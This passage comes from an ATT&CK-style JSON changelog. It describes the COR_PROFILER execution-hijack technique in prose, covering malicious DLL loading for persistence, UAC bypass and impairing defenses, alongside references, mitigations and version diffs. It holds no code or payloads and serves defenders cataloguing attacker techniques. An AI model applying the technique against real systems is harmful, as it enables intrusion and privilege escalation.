                            "description": "PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.",
                            "url": "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html"
                        },
                        {
                            "source_name": "Rapid7 AppDomain Manager Injection",
                            "description": "Spagnola, N. (2023, May 5). AppDomain Manager Injection: New Techniques For Red Teams. Retrieved March 29, 2024.",
                            "url": "https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ivy Drexel",
                        "Thomas B"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:57:09.601000+00:00\", \"old_value\": \"2025-04-15 21:48:08.401000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0517: Detection Strategy for Hijack Execution Flow through the AppDomainManager on Windows."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-24 22:30:55.843000+00:00",
                    "modified": "2026-04-16 18:58:17.752000+00:00",
                    "name": "COR_PROFILER",
                    "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and impair defenses provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/012",
                            "external_id": "T1574.012"
                        },
                        {
                            "source_name": "Almond COR_PROFILER Apr 2019",
                            "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.",
                            "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html"
                        },
                        {
                            "source_name": "Red Canary COR_PROFILER May 2020",
                            "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.",
                            "url": "https://redcanary.com/blog/cor_profiler-for-persistence/"
                        },
                        {
                            "source_name": "RedCanary Mockingbird May 2020",
                            "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.",
                            "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/"
                        },
                        {
                            "source_name": "Microsoft COR_PROFILER Feb 2013",
                            "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.",
                            "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)"
                        },
                        {
                            "source_name": "Microsoft Profiling Mar 2017",
                            "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.",
                            "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview"
                        },
                        {
                            "source_name": "subTee .NET Profilers May 2017",
                            "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.",
                            "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html"
                        },
                        {
                            "source_name": "GitHub OmerYa Invisi-Shell",
                            "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.",
                            "url": "https://github.com/OmerYa/Invisi-Shell"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jesse Brown, Red Canary"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 18:58:17.752000+00:00\", \"old_value\": \"2025-10-24 17:49:40.510000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\\n\\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\\n\\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and impair defenses provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)\", \"old_value\": \"Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\\n\\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\\n\\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)\", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\\n \\n-Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)\\n+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and impair defenses provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to18__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to18__0\"><a href=\"#difflib_chg_to18__top\">t</a></td><td class=\"diff_header\" id=\"from18_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;leverage&nbsp;the&nbsp;COR_PROFILER&nbsp;environment&nbsp;variab</td><td class=\"diff_next\"><a href=\"#difflib_chg_to18__top\">t</a></td><td class=\"diff_header\" id=\"to18_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;leverage&nbsp;the&nbsp;COR_PROFILER&nbsp;environment&nbsp;variab</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;to&nbsp;hijack&nbsp;the&nbsp;execution&nbsp;flow&nbsp;of&nbsp;programs&nbsp;that&nbsp;load&nbsp;the&nbsp;.N</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;to&nbsp;hijack&nbsp;the&nbsp;execution&nbsp;flow&nbsp;of&nbsp;programs&nbsp;that&nbsp;load&nbsp;the&nbsp;.N</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ET&nbsp;CLR.&nbsp;The&nbsp;COR_PROFILER&nbsp;is&nbsp;a&nbsp;.NET&nbsp;Framework&nbsp;feature&nbsp;which&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ET&nbsp;CLR.&nbsp;The&nbsp;COR_PROFILER&nbsp;is&nbsp;a&nbsp;.NET&nbsp;Framework&nbsp;feature&nbsp;which&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">llows&nbsp;developers&nbsp;to&nbsp;specify&nbsp;an&nbsp;unmanaged&nbsp;(or&nbsp;external&nbsp;of&nbsp;.NE</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">llows&nbsp;developers&nbsp;to&nbsp;specify&nbsp;an&nbsp;unmanaged&nbsp;(or&nbsp;external&nbsp;of&nbsp;.NE</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T)&nbsp;profiling&nbsp;DLL&nbsp;to&nbsp;be&nbsp;loaded&nbsp;into&nbsp;each&nbsp;.NET&nbsp;process&nbsp;that&nbsp;lo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T)&nbsp;profiling&nbsp;DLL&nbsp;to&nbsp;be&nbsp;loaded&nbsp;into&nbsp;each&nbsp;.NET&nbsp;process&nbsp;that&nbsp;lo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ads&nbsp;the&nbsp;Common&nbsp;Language&nbsp;Runtime&nbsp;(CLR).&nbsp;These&nbsp;profilers&nbsp;are&nbsp;d</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ads&nbsp;the&nbsp;Common&nbsp;Language&nbsp;Runtime&nbsp;(CLR).&nbsp;These&nbsp;profilers&nbsp;are&nbsp;d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">esigned&nbsp;to&nbsp;monitor,&nbsp;troubleshoot,&nbsp;and&nbsp;debug&nbsp;managed&nbsp;code&nbsp;exe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">esigned&nbsp;to&nbsp;monitor,&nbsp;troubleshoot,&nbsp;and&nbsp;debug&nbsp;managed&nbsp;code&nbsp;exe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cuted&nbsp;by&nbsp;the&nbsp;.NET&nbsp;CLR.(Citation:&nbsp;Microsoft&nbsp;Profiling&nbsp;Mar&nbsp;201</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cuted&nbsp;by&nbsp;the&nbsp;.NET&nbsp;CLR.(Citation:&nbsp;Microsoft&nbsp;Profiling&nbsp;Mar&nbsp;201</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">7)(Citation:&nbsp;Microsoft&nbsp;COR_PROFILER&nbsp;Feb&nbsp;2013)&nbsp;&nbsp;The&nbsp;COR_PROFI</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">7)(Citation:&nbsp;Microsoft&nbsp;COR_PROFILER&nbsp;Feb&nbsp;2013)&nbsp;&nbsp;The&nbsp;COR_PROFI</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">LER&nbsp;environment&nbsp;variable&nbsp;can&nbsp;be&nbsp;set&nbsp;at&nbsp;various&nbsp;scopes&nbsp;(syste</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">LER&nbsp;environment&nbsp;variable&nbsp;can&nbsp;be&nbsp;set&nbsp;at&nbsp;various&nbsp;scopes&nbsp;(syste</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m,&nbsp;user,&nbsp;or&nbsp;process)&nbsp;resulting&nbsp;in&nbsp;different&nbsp;levels&nbsp;of&nbsp;influe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m,&nbsp;user,&nbsp;or&nbsp;process)&nbsp;resulting&nbsp;in&nbsp;different&nbsp;levels&nbsp;of&nbsp;influe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce.&nbsp;System&nbsp;and&nbsp;user-wide&nbsp;environment&nbsp;variable&nbsp;scopes&nbsp;are&nbsp;sp</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce.&nbsp;System&nbsp;and&nbsp;user-wide&nbsp;environment&nbsp;variable&nbsp;scopes&nbsp;are&nbsp;sp</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecified&nbsp;in&nbsp;the&nbsp;Registry,&nbsp;where&nbsp;a&nbsp;[Component&nbsp;Object&nbsp;Model](ht</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecified&nbsp;in&nbsp;the&nbsp;Registry,&nbsp;where&nbsp;a&nbsp;[Component&nbsp;Object&nbsp;Model](ht</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1559/001)&nbsp;(COM)&nbsp;object&nbsp;ca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tps://attack.mitre.org/techniques/T1559/001)&nbsp;(COM)&nbsp;object&nbsp;ca</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;be&nbsp;registered&nbsp;as&nbsp;a&nbsp;profiler&nbsp;DLL.&nbsp;A&nbsp;process&nbsp;scope&nbsp;COR_PROFI</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;be&nbsp;registered&nbsp;as&nbsp;a&nbsp;profiler&nbsp;DLL.&nbsp;A&nbsp;process&nbsp;scope&nbsp;COR_PROFI</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">LER&nbsp;can&nbsp;also&nbsp;be&nbsp;created&nbsp;in-memory&nbsp;without&nbsp;modifying&nbsp;the&nbsp;Regi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">LER&nbsp;can&nbsp;also&nbsp;be&nbsp;created&nbsp;in-memory&nbsp;without&nbsp;modifying&nbsp;the&nbsp;Regi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stry.&nbsp;Starting&nbsp;with&nbsp;.NET&nbsp;Framework&nbsp;4,&nbsp;the&nbsp;profiling&nbsp;DLL&nbsp;does</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stry.&nbsp;Starting&nbsp;with&nbsp;.NET&nbsp;Framework&nbsp;4,&nbsp;the&nbsp;profiling&nbsp;DLL&nbsp;does</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;not&nbsp;need&nbsp;to&nbsp;be&nbsp;registered&nbsp;as&nbsp;long&nbsp;as&nbsp;the&nbsp;location&nbsp;of&nbsp;the&nbsp;DL</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;not&nbsp;need&nbsp;to&nbsp;be&nbsp;registered&nbsp;as&nbsp;long&nbsp;as&nbsp;the&nbsp;location&nbsp;of&nbsp;the&nbsp;DL</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">L&nbsp;is&nbsp;specified&nbsp;in&nbsp;the&nbsp;COR_PROFILER_PATH&nbsp;environment&nbsp;variable</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">L&nbsp;is&nbsp;specified&nbsp;in&nbsp;the&nbsp;COR_PROFILER_PATH&nbsp;environment&nbsp;variable</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;Microsoft&nbsp;COR_PROFILER&nbsp;Feb&nbsp;2013)&nbsp;&nbsp;Adversaries&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;Microsoft&nbsp;COR_PROFILER&nbsp;Feb&nbsp;2013)&nbsp;&nbsp;Adversaries&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;abuse&nbsp;COR_PROFILER&nbsp;to&nbsp;establish&nbsp;persistence&nbsp;that&nbsp;executes&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;abuse&nbsp;COR_PROFILER&nbsp;to&nbsp;establish&nbsp;persistence&nbsp;that&nbsp;executes&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;malicious&nbsp;DLL&nbsp;in&nbsp;the&nbsp;context&nbsp;of&nbsp;all&nbsp;.NET&nbsp;processes&nbsp;every&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">a&nbsp;malicious&nbsp;DLL&nbsp;in&nbsp;the&nbsp;context&nbsp;of&nbsp;all&nbsp;.NET&nbsp;processes&nbsp;every&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ime&nbsp;the&nbsp;CLR&nbsp;is&nbsp;invoked.&nbsp;The&nbsp;COR_PROFILER&nbsp;can&nbsp;also&nbsp;be&nbsp;used&nbsp;to</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ime&nbsp;the&nbsp;CLR&nbsp;is&nbsp;invoked.&nbsp;The&nbsp;COR_PROFILER&nbsp;can&nbsp;also&nbsp;be&nbsp;used&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;elevate&nbsp;privileges&nbsp;(ex:&nbsp;[Bypass&nbsp;User&nbsp;Account&nbsp;Control](https</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;elevate&nbsp;privileges&nbsp;(ex:&nbsp;[Bypass&nbsp;User&nbsp;Account&nbsp;Control](https</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">://attack.mitre.org/techniques/T1548/002))&nbsp;if&nbsp;the&nbsp;victim&nbsp;.NE</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">://attack.mitre.org/techniques/T1548/002))&nbsp;if&nbsp;the&nbsp;victim&nbsp;.NE</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T&nbsp;process&nbsp;executes&nbsp;at&nbsp;a&nbsp;higher&nbsp;permission&nbsp;level,&nbsp;as&nbsp;well&nbsp;as&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T&nbsp;process&nbsp;executes&nbsp;at&nbsp;a&nbsp;higher&nbsp;permission&nbsp;level,&nbsp;as&nbsp;well&nbsp;as&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;hook&nbsp;and&nbsp;<span class=\"diff_chg\">[Impair&nbsp;Defenses]</span>(<span class=\"diff_chg\">https</span>:<span class=\"diff_chg\">//atta</span>ck<span class=\"diff_chg\">.mitre.org/techn</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;hook&nbsp;and&nbsp;<span class=\"diff_chg\">impair&nbsp;defenses&nbsp;provided&nbsp;by&nbsp;.NET&nbsp;processes.</span>(<span class=\"diff_chg\">Cita</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">iques/T1562)&nbsp;provided&nbsp;b</span>y<span class=\"diff_sub\">&nbsp;.NET&nbsp;processes.(Citation:&nbsp;RedCanary</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">tion</span>:<span class=\"diff_chg\">&nbsp;RedCanary&nbsp;Mo</span>ck<span class=\"diff_chg\">ingbird&nbsp;Ma</span>y&nbsp;2020)(Citation:&nbsp;Red&nbsp;Canary&nbsp;C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Mockingbird&nbsp;May</span>&nbsp;2020)(Citation:&nbsp;Red&nbsp;Canary&nbsp;COR_PROFILER&nbsp;May</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">OR_PROFILER&nbsp;May&nbsp;2020)(Citation:&nbsp;Almond&nbsp;COR_PROFILER&nbsp;Apr&nbsp;2019</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2020)(Citation:&nbsp;Almond&nbsp;COR_PROFILER&nbsp;Apr&nbsp;2019)(Citation:&nbsp;Git</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)(Citation:&nbsp;GitHub&nbsp;OmerYa&nbsp;Invisi-Shell)(Citation:&nbsp;subTee&nbsp;.NE</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Hub&nbsp;OmerYa&nbsp;Invisi-Shell)(Citation:&nbsp;subTee&nbsp;.NET&nbsp;Profilers&nbsp;May</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T&nbsp;Profilers&nbsp;May&nbsp;2017)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2017)</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1024: Restrict Registry Permissions",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
